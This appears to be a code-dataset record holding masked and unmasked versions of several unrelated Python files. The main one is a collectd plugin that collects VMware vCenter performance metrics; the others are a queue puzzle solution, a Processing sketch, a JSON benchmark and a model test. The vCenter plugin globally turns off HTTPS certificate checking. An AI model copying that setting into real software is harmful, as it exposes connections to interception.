The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {'datastore': {}, 'datacenter': {}}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
def poll_datastore(self, server, obj, name):
"""
Gather metrics about a specific datastore.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datastore.
:param str name:
Name of the datastore.
:returns:
A dictionary with four keys: capacity, free, used, and usage. The
capacity, free, and used space are measured in megabytes while the
usage is a percentage.
"""
capacity = free = usage = 0
try:
self.log.debug('query datastore %s' % (name,))
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.capacity', 'summary.freeSpace'], from_node
=obj, obj_type='Datastore')
for ps in props:
for prop in ps.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.capacity':
capacity = pv / MB
elif pn == 'summary.freeSpace':
free = pv / MB
except:
self.log.exception('Failed to get datastore metrics')
if capacity > 0:
usage = (capacity - free) / float(capacity) * 100
return {'capacity': capacity, 'free': free, 'used': capacity - free,
'usage': usage}
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
elif 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
if group_type == 'datacenter':
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':
mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,
'vms_running': vms_running, 'vms_stopped': vms_stopped,
child_type: child_stats}
return group_stats
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize', 'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100 if cpu_total > 0 else 0
mem_percent = mem_usage / float(mem_total) * 100 if mem_total > 0 else 0
stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':
cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,
'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':
mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,
'vms_stopped': vms_stopped}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.levelno == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.levelno]
handler(record.getMessage())
<mask token>
| # collectd-vcenter - vcenter.py
#
# Author : Loic Lambiel @ exoscale
# Contributor : Josh VanderLinden
# Description : This is a collectd python module to gather stats from Vmware
# vcenter
import logging
import ssl
import time
from pysphere import VIServer
try:
import collectd
COLLECTD_ENABLED = True
except ImportError:
COLLECTD_ENABLED = False
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
MB = 1024 ** 2
HOST_STATUS = ('green', 'gray', 'yellow', 'red')
class Collector(object):
def __init__(self, vcenters, username=None, password=None,
verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {
'datastore': {},
'datacenter': {},
}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
def poll_datastore(self, server, obj, name):
"""
Gather metrics about a specific datastore.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datastore.
:param str name:
Name of the datastore.
:returns:
A dictionary with four keys: capacity, free, used, and usage. The
capacity, free, and used space are measured in megabytes while the
usage is a percentage.
"""
capacity = free = usage = 0
try:
self.log.debug('query datastore %s' % (name,))
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.capacity',
'summary.freeSpace',
], from_node=obj, obj_type='Datastore')
for ps in props:
for prop in ps.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.capacity':
capacity = pv / MB
elif pn == 'summary.freeSpace':
free = pv / MB
except:
self.log.exception('Failed to get datastore metrics')
if capacity > 0:
usage = (capacity - free) / float(capacity) * 100
return {
'capacity': capacity,
'free': free,
'used': capacity - free,
'usage': usage,
}
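# Worked example (editor's note): a 500 GiB datastore with 100 GiB free
# yields capacity=512000 MB, free=102400 MB, used=409600 MB and
# usage=(512000-102400)/512000*100 = 80.0 -- a percentage, unlike the other
# three values, which are megabytes.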
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
else:
if 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
# change collection behavior based on the type of group we're dealing
# with
if group_type == 'datacenter':
# find each cluster in the datacenter
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
# find each host in the datacenter or cluster
find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
# initialize some metrics
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
# iterate over each child node in this object group
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
# aggregate data from each child to the top level
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
# recalculate percentages
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
# return the current metrics for this group
group_stats = {
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
child_type: child_stats,
}
return group_stats
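# Worked example (editor's note): two hosts reporting cpu_total 20000/10000 MHz
# and cpu_usage 5000/5000 MHz aggregate to cpu_total=30000 and cpu_usage=10000,
# so the recomputed cpu_percent is 10000/30000*100 = 33.3 -- a
# capacity-weighted figure, not the mean of the per-host percentages
# (25 and 50).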
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize',
'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz',
], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100 if cpu_total > 0 else 0
mem_percent = mem_usage / float(mem_total) * 100 if mem_total > 0 else 0
stats = {
'status': status,
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'cpu_count': cpu_count,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
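# Example (editor's sketch; hostnames and credentials are placeholders):
# the keys handled above correspond to a collectd python-plugin stanza like
#
#   <Plugin python>
#       Import "vcenter"
#       <Module vcenter>
#           Vcenter "vc1.example.com vc2.example.com"
#           Username "monitor"
#           Password "secret"
#           Sleep 20
#       </Module>
#   </Plugin>
#
# Note that the Vcenter value is whitespace-split, so several servers fit
# in a single directive.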
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
# report information for all vCenter servers
for vcenter, data in info.items():
# report datastore information
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
# report datacenter information
for dc_name, dc_data in data['datacenter'].items():
# extract any cluster and host information for later processing
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
# report cluster information
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
# report host information
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
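# Editor's note: under collectd's host/plugin-instance/type-instance naming,
# the dispatch above yields identifiers of the form
# <host>/vCenter-<obj_instance>/gauge-<obj_type>; for a cluster metric the
# host slot holds the datacenter name, e.g. (placeholder names)
# dc1/vCenter-cluster1/gauge-cluster_cpu_percent.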
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {
logging.CRITICAL: collectd.error,
logging.ERROR: collectd.error,
logging.WARN: collectd.warning,
logging.INFO: collectd.info,
logging.DEBUG: collectd.info,
}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.levelno == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.levelno]
handler(record.getMessage())
if COLLECTD_ENABLED:
instance = CollectdCollector([])
collectd.register_config(instance.configure)
collectd.register_read(instance.read)
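# Standalone usage (editor's sketch; hostname and credentials are
# placeholders): without collectd, Collector falls back to basicConfig
# logging, so the poller can be exercised directly:
if __name__ == '__main__' and not COLLECTD_ENABLED:
    stats = Collector(['vc1.example.com'], username='monitor',
                      password='secret', verbose=True).poll()
    print(stats)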
| [
11,
13,
19,
20,
24
] |
614 | 7e50fc5eb794d7f2e4805924dcc7a99296e0d732 | /usr/share/pyshared/Bio/Phylo/_io.py | null | null | null | null | [
0
] |
615 | a571abd88184c8d8bb05245e9c3ce2e4dabb4c09 | <mask token>
| <mask token>
for _ in range(t):
n, m = map(int, sys.stdin.readline().split())
q = deque(map(int, sys.stdin.readline().split()))
count = 0
while q:
highest = max(q)
doc = q.popleft()
m -= 1
if doc != highest:
q.append(doc)
if m < 0:
m = len(q) - 1
else:
count += 1
if m < 0:
print(count)
break
| <mask token>
t = int(sys.stdin.readline().rstrip())
for _ in range(t):
n, m = map(int, sys.stdin.readline().split())
q = deque(map(int, sys.stdin.readline().split()))
count = 0
while q:
highest = max(q)
doc = q.popleft()
m -= 1
if doc != highest:
q.append(doc)
if m < 0:
m = len(q) - 1
else:
count += 1
if m < 0:
print(count)
break
| import sys
from collections import deque
t = int(sys.stdin.readline().rstrip())
for _ in range(t):
n, m = map(int, sys.stdin.readline().split())
q = deque(map(int, sys.stdin.readline().split()))
count = 0
while q:
highest = max(q)
doc = q.popleft()
m -= 1
if doc != highest:
q.append(doc)
if m < 0:
m = len(q) - 1
else:
count += 1
if m < 0:
print(count)
break
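# Worked example (editor's note): for the input
#   1
#   4 0
#   1 2 3 4
# the tracked document (position m=0, priority 1) keeps being re-queued
# behind higher-priority jobs and is printed last, so the output is 4.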
| null | [
0,
1,
2,
3
] |
616 | 2257494dec9fccc4e8bd4acf0aff31a73c252a61 | <mask token>
| <mask token>
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
| <mask token>
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
| h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0, 0, width)
pushMatrix()
translate(xorg, yoff)
y = sin(frameCount % 20 / 20.0 * PI + PI) * h
if frameCount % 20 == 0 and frameCount > 0:
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0, 0, 1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1, 3)
if random(1) > 0.5:
xvel *= -1
xorg = random(400, 600)
else:
xorg = random(50, 400)
h = int(random(3, 7)) * 50
else:
fill(0, 0, 1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame('frames/####.jpg')
if frameCount > 700:
noLoop()
| h = 160
xorg = 0
yoff = 400
xcount = 0
xvel = 2
def setup():
size(800, 800)
colorMode(HSB, 360, 1, 1, 1)
background(140, 0.49, 0.75)
frameRate(30)
noStroke()
def draw():
global h, xorg, yoff, xcount, xvel
if frameCount % 10 == 0:
fill(140, 0.49, 0.75, 0.2)
square(0,0,width)
pushMatrix()
translate(xorg,yoff)
y = sin((frameCount%20)/20.0*PI+PI)*h
if (frameCount % 20 == 0 and frameCount > 0):
h -= 50
if h <= 0:
fill(0)
ellipse(xcount, y, 25, 10)
fill(0,0,1)
circle(xcount, y, 5)
yoff = random(300, 700)
xcount = 0
xvel = random(1,3)
if random(1)>0.5:
xvel *= -1
xorg = random(400,600)
else:
xorg = random(50,400)
h = int(random(3,7))*50
else:
fill(0,0,1)
circle(xcount, y, 5)
xcount += xvel
popMatrix()
saveFrame("frames/####.jpg")
if frameCount > 700:
noLoop()
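# Editor's note: sin((frameCount % 20) / 20.0 * PI + PI) sweeps from PI to
# 2*PI over 20 frames, so y goes 0 -> -h -> 0; with Processing's downward
# y-axis that is one upward arc whose height h shrinks by 50 each cycle,
# until the white dot "flattens" into the black ellipse and a new bounce
# is randomised.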
| [
0,
1,
2,
3,
4
] |
617 | 6f99b4e4204e85c78f9c02a5cd53cd76f52c022c | <mask token>
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
<mask token>
| <mask token>
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
<mask token>
| <mask token>
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
if __name__ == '__main__':
text = Path('/tmp/1.json').read_text()
notify('%s UltraJSON\t%d' % (platform.python_implementation(), os.getpid())
)
test_json(text)
notify('stop')
| import ujson as json
import platform
import socket
import os
from pathlib import Path
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(('localhost', 9001)):
s.sendall(bytes(msg, 'utf8'))
if __name__ == '__main__':
text = Path('/tmp/1.json').read_text()
notify('%s UltraJSON\t%d' % (platform.python_implementation(), os.getpid())
)
test_json(text)
notify('stop')
| import ujson as json
import platform
import socket
import os
from pathlib import Path
def test_json(text):
jobj = json.loads(text)
l = len(jobj['coordinates'])
x = 0
y = 0
z = 0
for coord in jobj['coordinates']:
x += coord['x']
y += coord['y']
z += coord['z']
print(x / l)
print(y / l)
print(z / l)
def notify(msg):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if not s.connect_ex(("localhost", 9001)):
s.sendall(bytes(msg, 'utf8'))
if __name__ == '__main__':
text = Path('/tmp/1.json').read_text()
notify("%s UltraJSON\t%d" % (platform.python_implementation(), os.getpid()))
test_json(text)
notify("stop")
| [
1,
2,
3,
4,
5
] |
618 | 94be205e516c1f1248b6028419c04c927236596e | <mask token>
| <mask token>
def test_colorization_net():
model_cfg = dict(type='ColorizationNet', input_nc=4, output_nc=2,
norm_type='batch')
model = MODELS.build(model_cfg)
assert model.__class__.__name__ == 'ColorizationNet'
input_A = torch.rand(1, 1, 256, 256)
input_B = torch.rand(1, 2, 256, 256)
mask_B = torch.rand(1, 1, 256, 256)
target_shape = 1, 2, 256, 256
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
assert feature_map['conv1_2'].shape == (1, 64, 256, 256) and feature_map[
'out_reg'].shape == target_shape
if torch.cuda.is_available():
model = model.cuda()
input_A = input_A.cuda()
input_B = input_B.cuda()
mask_B = mask_B.cuda()
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
for item in feature_map.keys():
assert torch.is_tensor(feature_map[item])
| import torch
